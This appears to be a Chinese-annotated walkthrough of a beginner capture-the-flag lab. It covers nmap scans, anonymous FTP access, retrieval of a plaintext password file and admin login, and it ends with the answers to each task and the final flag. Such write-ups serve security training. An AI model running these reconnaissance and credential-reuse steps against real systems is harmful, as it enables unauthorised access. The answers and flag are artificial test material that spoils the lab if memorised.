Task 1

Q：What nmap scanning switch employs the use of default scripts during a scan?
​
A：-sC

​

Task 2

Q：What service version is found to be running on port 21?
​

┌──(root💀kali)-[~]
└─# nmap -sV -Pn -p21 10.129.1.15   
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-05 15:47 CST
Nmap scan report for 10.129.1.15
Host is up (0.27s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.86 seconds

-sV仅检测版本号
-Pn跳过ping扫描
​
A：vsFTPd 3.0.3

​

Task 3

Q：What FTP code is returned to us for the "Anonymous FTP login allowed" message?
​

┌──(root💀kali)-[~]
└─# nmap -sC -Pn -p21 10.129.1.15
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-05 15:50 CST
Nmap scan report for 10.129.1.15
Host is up (0.51s latency).

PORT   STATE SERVICE
21/tcp open  ftp
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r--    1 ftp      ftp            33 Jun 08  2021 allowed.userlist
|_-rw-r--r--    1 ftp      ftp            62 Apr 20  2021 allowed.userlist.passwd
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.10.16.86
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status

Nmap done: 1 IP address (1 host up) scanned in 8.09 seconds

第9行能看到允许匿名登录，响应码是230
​
A：230
​

Task 4

Q：What command can we use to download the files we find on the FTP server?
​
A：get
​

Task 5

Q：What is one of the higher-privilege sounding usernames in the list we retrieved?
​
这个需要ftp登录进去，然后get文件下来，但是根据提示直接盲猜admin就可以了
​
A：admin
​

Task 6

Q：What version of Apache HTTP Server is running on the target host?
​

┌──(root💀kali)-[~]
└─# nmap -sV -Pn 10.129.1.15 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-05 15:55 CST
Nmap scan report for 10.129.1.15
Host is up (0.62s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.59 seconds

第9行，十分明显，我这个直接列出了所有版本号，可以定点查询加参数-p80

​
A：2.4.41
​

Task 7

Q：What is the name of a handy web site analysis plug-in we can install in our browser?
​
A：wappalyzer
​

Task 8

Q：What switch can we use with gobuster to specify we are looking for specific filetypes?
​
A：-x

​

Task 9

Q：What file have we found that can provide us a foothold on the target?
​
A：login.php
​

Flag

ftp登录进去，下载密码文件
​

┌──(root💀kali)-[~]
└─# ftp 10.129.1.15
Connected to 10.129.1.15.
220 (vsFTPd 3.0.3)
Name (10.129.1.15:root): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 ftp      ftp            33 Jun 08  2021 allowed.userlist
-rw-r--r--    1 ftp      ftp            62 Apr 20  2021 allowed.userlist.passwd
226 Directory send OK.
ftp> get allowed.userlist.passwd
local: allowed.userlist.passwd remote: allowed.userlist.passwd
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for allowed.userlist.passwd (62 bytes).
226 Transfer complete.
62 bytes received in 0.00 secs (197.2211 kB/s)
ftp> exit
221 Goodbye.

他这个第四个是admin的密码
​

┌──(root💀kali)-[~]
└─# cat allowed.userlist.passwd 
root
Supersecretpassword1
@BaASD&9032123sADS
rKXM59ESxesUFHAd

直接用admin登录进去，得到flag
​
flag：c7110277ac44d78b6a9fff2232434d16